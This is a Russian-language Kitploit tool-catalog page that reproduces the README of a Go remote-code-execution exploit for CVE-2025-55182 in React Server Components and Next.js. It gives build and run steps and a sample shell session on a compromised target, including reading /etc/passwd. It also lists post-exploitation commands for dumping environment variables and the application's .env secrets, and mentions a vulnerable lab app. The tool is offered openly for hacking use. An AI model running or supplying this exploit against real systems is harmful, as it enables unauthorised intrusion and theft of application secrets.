Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Инструмент эксплуатации RCE, нацеленный на CVE-2025-55182, критическую уязвимость в React Server Components (RSC), затрагивающую React 19.0.0 - 19.2.0 и приложения Next.js. | Kitploit
Инструменты/GitHubGitHub/yyax13/cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubyyax13/cve-2025-55182

CVE-2025-55182

Инструмент эксплуатации RCE, нацеленный на CVE-2025-55182, критическую уязвимость в React Server Components (RSC), затрагивающую React 19.0.0 - 19.2.0 и приложения Next.js.

Репозиторий
18 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

👻 CVE-2025-55182 Go эксплойт

Интерактивный инструмент RCE для CVE-2025-55182 (React Server Components)

GitHub Stars License Go

🎯 Что это?

CVE-2025-55182 — минимальный интерактивный инструмент эксплуатации RCE, нацеленный на CVE-2025-55182, критическую уязвимость в React Server Components (RSC), затрагивающую React 19.0.0 – 19.2.0 и приложения Next.js.


📦 Установка

Предварительные требования

  • Go версии 1.18 или выше
  • Уязвимая цель, работающая на React 19.0.0 – 19.2.0

Сборка из исходников

root@kitploit:~
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go

🚀 Использование

Базовое использование

root@kitploit:~
./CVE-2025-55182

Интерактивный сеанс

root@kitploit:~
_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
╲_   ___ ╲   ╲ ╱   ╱╲_   _____╱         ╲_____  ╲   _  ╲  ╲_____  ╲  │   ____╱          │   ____╱│   ____╱_   │╱  __  ╲ ╲_____  ╲ 
╱    ╲  ╲╱╲   Y   ╱  │    __)_   ______  ╱  ____╱  ╱_╲  ╲  ╱  ____╱  │____  ╲   ______  │____  ╲ │____  ╲ │   │>      <  ╱  ____╱ 
╲     ╲____╲     ╱   │        ╲ ╱_____╱ ╱       ╲  ╲_╱   ╲╱       ╲  ╱       ╲ ╱_____╱  ╱       ╲╱       ╲│   ╱   ──   ╲╱       ╲ 
 ╲______  ╱ ╲___╱   ╱_______  ╱         ╲_______ ╲_____  ╱╲_______ ╲╱______  ╱         ╱______  ╱______  ╱│___╲______  ╱╲_______ ╲
        ╲╱                  ╲╱                  ╲╱     ╲╱         ╲╱       ╲╱                 ╲╱       ╲╱            ╲╱         ╲╱  

    React2Shell RCE | CVE-2025-55182
    @hghost010

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Цель: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] УЯЗВИМ
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit

🎥 Демонстрация

https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f


Затронутые версии:

  • React 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Приложения Next.js, использующие эти версии React

Исправленные версии:

  • React 19.2.1+
  • Next.js с обновлённой зависимостью React

🧪 Настройка тестовой лаборатории

Хотите протестировать это безопасно? Настройте уязвимую лабораторную среду:

root@kitploit:~
# Клонировать уязвимое приложение Next.js
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# Установить и запустить
npm install --legacy-peer-deps
npm run dev

# В другом терминале запустить ghost-scanner
./CVE-2025-55182
# Ввести: localhost:3000

📚 Часто используемые команды

root@kitploit:~
ghost@rce $ id                    # Проверить привилегии пользователя
ghost@rce $ whoami                # Текущее имя пользователя
ghost@rce $ pwd                   # Текущая директория
ghost@rce $ ls -la                # Список файлов
ghost@rce $ cat /etc/passwd       # Чтение файлов
ghost@rce $ uname -a              # Информация о системе
ghost@rce $ env                   # Переменные окружения
ghost@rce $ ps aux                # Запущенные процессы
ghost@rce $ netstat -tulpn        # Сетевые соединения
ghost@rce $ cat /app/.env         # Секреты приложения

📊 Статистика репозитория

GitHub repo size GitHub last commit GitHub issues


🔗 Ссылки

  • Детали CVE-2025-55182
  • Рекомендации по безопасности React
  • Рекомендации по безопасности Next.js
  • Оригинальный PoC от maple3142
  • Исследование Assetnote
  • Уязвимое тестовое приложение

💬 Сообщество и поддержка

  • 🐦 Twitter/X: @hghost010
  • 🐙 GitHub: Hghost0x00

Нашли ошибку? Откройте issue


⭐ Поддержите проект

Если этот инструмент вам помог:

  • ⭐ Поставьте звезду репозиторию
  • 💬 Поделитесь с другими

📝 Лицензия

Этот проект распространяется под лицензией MIT — подробнее см. в файле LICENSE.


Сделано с 👻 от Hghost0x00
Счастливого взлома ⚡

Скачать инструмент